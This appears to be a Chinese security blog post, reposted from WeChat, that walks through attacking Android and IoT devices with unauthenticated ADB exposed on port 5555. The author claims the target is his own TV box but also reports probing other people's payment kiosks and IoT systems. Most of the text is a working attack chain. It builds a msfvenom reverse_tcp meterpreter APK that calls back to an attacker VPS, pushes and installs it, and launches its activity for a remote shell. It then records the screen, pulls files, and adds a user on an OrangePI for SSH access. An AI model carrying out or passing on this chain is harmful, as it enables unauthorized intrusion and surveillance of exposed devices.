adb未授权访问所导致的攻击

admin 2024年11月24日14:19:05评论29 views字数 3433阅读11分26秒阅读模式

       开始前 本文章由群内村サメマル 提供。渗透机器为自己家网络电视盒切勿用于非法操作

adb全称叫做Android Debug Bridge,好像挺高大上的,但是说白了就是个安卓的调试工具,adb的rce(remote command execute)就是因为开放端口5555且未鉴权所导致的攻击者可以通过adb命令连接到失陷设备上,比如版本较低的开放了5555端口的安卓手机或者基于安卓开发的例如智能电视只因等等(暗藏鸡脚)

     我们需要去连接到adb,那么我们需要使用adb工具,下载安装完成,因为没有配置系统变量,那么我们进入目录下直接运行adb.exe进行操作

adb下载链接:

https://developer.android.com/studio/releases/platform-tools?hl=zh-cn

    连接我们使用adb connect ip:5555,输入命令adb devices,如果返回连接成功,就会显示下图

adb未授权访问所导致的攻击

看到devices就代表连接成功

查看一下系统内存使用:adb shell dumpsys meminfo

adb未授权访问所导致的攻击

这里只截取了一部分

查看Android 系统版本:adb shell getprop ro.build.version.release

adb未授权访问所导致的攻击

系统有点子老啊

我们使用adb root,查看是否可以以root的身份进行连接

adb未授权访问所导致的攻击

无法使用root进行连接,如果adb root执行成功,那么我们每一次连接都是root用户身份登录,可惜这儿不行QAQ

卸载/安装adb uninstall(install) com.xxx.yy(xxx.apk)

adb未授权访问所导致的攻击

广播和模拟按键输入:也是我觉得最好玩的一个

广播

android.net.conn.CONNECTIVITY_CHANGE 网络连接变化 android.intent.action.SCREEN_ON 屏幕点亮 android.intent.action.SCREEN_OFF 屏幕熄灭 android.intent.action.BATTERY_LOW 电量低,会弹出电量低提示框 android.intent.action.BATTERY_OKAY 电量恢复了 android.intent.action.BOOT_COMPLETED 设备启动完毕 android.intent.action.DEVICE_STORAGE_LOW 存储空间过低 android.intent.action.DEVICE_STORAGE_OK 存储空间恢复 android.intent.action.PACKAGE_ADDED 安装了新的应用 android.net.wifi.STATE_CHANGE wiFi 连接状态发生变化 android.net.wifi.WIFI_STATE_CHANGED wiFi状态变为启用关闭/正在启动/正在关闭/未知 android.intent.action.BATTERY_CHANGED 电池电量发生变化 android.intent.action.INPUT_METHOD_CHANGED 系统输入法发生变化 android.intent.action.ACTION_POWER_CONNECTED 外部电源连接 android.intent.action.ACTION_POWER_DISCONNECTED 外部电源断开连接 android.intent.action.DREAMING_STARTED 系统开始休眠 android.intent.action.DREAMING_STOPPED 系统停止休眠 android.intent.action.WALLPAPER_CHANGED 壁纸发生变化 android.intent.action.HEADSET_PLUG 插入耳机 android.intent.action.MEDIA_UNMOUNTED 卸载外部介质 android.intent.action.MEDIA_MOUNTED 挂载外部介质 android.os.action.POWER_SAVE_MODE_CHANGED 省电模式开启

用法:adb shell am broadcast -a android.intent.action.SCREEN_ON

模拟输入

参考链接:https://developer.android.com/reference/android/view/KeyEvent#constants

静音:adb shell input keyevent 164

电源:adb shell input keyevent 26

等等,挺多的,我这里只举了两个

然后我们随便做个msf的木马,我懒,懒得去做加壳免杀啥的,爱谁谁,就这样吧,直接上传上去

msfvenom -p android/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=3451 R > shell.apk > shell.apk

msf运行起来

adb未授权访问所导致的攻击

adb未授权访问所导致的攻击

上传马子,这儿直接把马子从vpsscp保存到本地目录,通过adb push 本地文件 远程设备需要保存的路径

adb未授权访问所导致的攻击

上传完成,如果碰到有Permission denied,说明你上传的路径无权限,小问题,换个路径就好了,实在不行,换个target就好了,下面就到了安装马子这个环节了,安装其实很简单

adb install shell.apk

adb未授权访问所导致的攻击

啊这,有毒,绝对有毒!!!咱给他重启一下

adb未授权访问所导致的攻击

今天动了脑子,不会要长脑花了吧

adb未授权访问所导致的攻击

安装成功,重启解决99%,剩下1%换目标

现在需要去运行这个马子上线msf

我们先看看安卓的木马是哪个包

使用命令查看第三方软件应用:adb shell pm list packages -3

adb未授权访问所导致的攻击

找到包了,要启动Activity才能上线msf

如何启动呢?

我百度谷歌搜了半天没搜到msf的apk文件有些啥Activity,气抖冷

那就创建差异化赛道,简单,我们就直接把shell.apk给简单的逆一下

adb未授权访问所导致的攻击

运行jdax-gui.bat,加载我们的木马文件(懒得搜,项目文件自己去github搜哈)

adb未授权访问所导致的攻击找到com.metasploit.stage.MainActivity,这个就是我们上线msf所需要运行的

adb未授权访问所导致的攻击

运行这个主类,使用命令:

am start 包/Activity

am start com.metasploit.stage/com.metasploit.stage.MainActivity

adb未授权访问所导致的攻击

(不知道为啥在交互shell里显示不全)

运行,上线msf,现在,成功通过我们生成的木马apk文件上线到vps

adb未授权访问所导致的攻击

看了一下,没啥好玩的,就是个电视机tv盒子,用adb命令给他录了个屏,使用命令screenrecord /存放路径/screen.mp4,这个默认录屏三分钟,然后pull到本地

adb未授权访问所导致的攻击

当然,如果我们想方便快捷一点,不使用命令去操作,可以使用一个简单的工具去连接

项目地址https://github.com/OrangeOran/ADB-Tool

不过在使用这个工具的时候,我们需要手动连接到这个设备

adb未授权访问所导致的攻击

然后点击获取设备就能获取到设备信息,图形化界面比较简洁

adb未授权访问所导致的攻击

感觉不是很行,所以下面我再介绍一款比较强悍的连接工具AutumnBox

adb未授权访问所导致的攻击

这个工具提供adb连接,功能强大,点击连接网络设备,输入IP地址就行,默认访问端口是5555

项目地址:https://github.com/zsh2401/AutumnBox

可以截图、设置管理账户,那些功能我还没玩过(怕一不小心给他玩崩了)

adb未授权访问所导致的攻击

截了张图,不过貌似不太行hhhh

又学到新姿势了

当然,经过我的大量测试,除了安卓系统(比如一些游戏机、tv盒子、奶茶饮品收付款系统)、iot系统(温度检测系统)之外,也有其它系统也存在adb的5555端口,比如这个orangePI系统,他就存在一个adbroot权限获取

adb未授权访问所导致的攻击

给他添加一个用户进去

adb未授权访问所导致的攻击

用户添加成功

尝试ssh连接

adb未授权访问所导致的攻击

可以看到,是能成功连接到这台orangePI

adb未授权访问所导致的攻击

所以,在平时不用adb调试的时候,就尽量关闭5555端口,或者使用usb连接的方式调试

特别声明:

       由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。

        作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。切勿用于非法,仅供学习参考

原文始发于微信公众号(南街老友):adb未授权访问所导致的攻击

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月24日14:19:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   adb未授权访问所导致的攻击https://cn-sec.com/archives/1632443.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息